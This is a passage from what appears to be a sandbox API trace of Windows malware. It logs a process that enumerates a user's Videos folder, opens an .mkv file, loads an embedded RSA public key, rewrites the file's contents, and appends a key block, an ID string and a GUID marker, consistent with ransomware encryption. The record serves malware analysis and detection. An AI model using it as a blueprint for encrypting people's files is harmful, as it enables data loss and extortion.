HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.285] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.285] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0059.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.285] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.285] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.285] PathFindFileNameW (pszPath="") returned="" [0059.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.285] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.285] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x73aa6f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x73aa6f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.286] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c23fe0, ftCreationTime.dwHighDateTime=0x1d4d0c9, ftLastAccessTime.dwLowDateTime=0x6231a9f0, ftLastAccessTime.dwHighDateTime=0x1d4cc57, ftLastWriteTime.dwLowDateTime=0x6231a9f0, ftLastWriteTime.dwHighDateTime=0x1d4cc57, nFileSizeHigh=0x0, nFileSizeLow=0x15b36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="-UhIDPZCm6I2UoJXWw.mkv", cAlternateFileName="-UHIDP~1.MKV")) returned 1 [0059.286] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-UhIDPZCm6I2UoJXWw.mkv") returned=".mkv" [0059.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\-UhIDPZCm6I2UoJXWw.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\-uhidpzcm6i2uojxww.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.286] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=88886) returned 1 [0059.286] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.288] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15b10, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.288] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.289] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15b36, lpOverlapped=0x0) returned 1 [0059.290] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.290] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.290] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.290] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8940) returned 1 [0059.290] CryptCreateHash (in: hProv=0x6b8940, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.290] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.290] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.291] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.291] GetLastError () returned 0x0 [0059.291] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.291] CryptReleaseContext (hProv=0x6b8940, dwFlags=0x0) returned 1 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.291] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.291] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.291] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.291] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5b0 | out: hHeap=0x660000) returned 1 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5c8 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b5b0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5b0 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.292] GetCurrentThreadId () returned 0x9e0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7e4f8 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.292] GetCurrentThreadId () returned 0x9e0 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b5b0 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5c8 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b598 [0059.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5e0 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5b0 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b5b0 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5b0 | out: hHeap=0x660000) returned 1 [0059.294] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8940 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5e0 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b5c8 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b598 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b580 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c836a0 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.296] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0x15b31, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0x15b31, lpOverlapped=0x0) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.296] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15b36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.296] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.296] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.296] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.296] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.296] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.297] CloseHandle (hObject=0x5cc) returned 1 [0059.298] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8940 [0059.298] RtlAllocateHeap 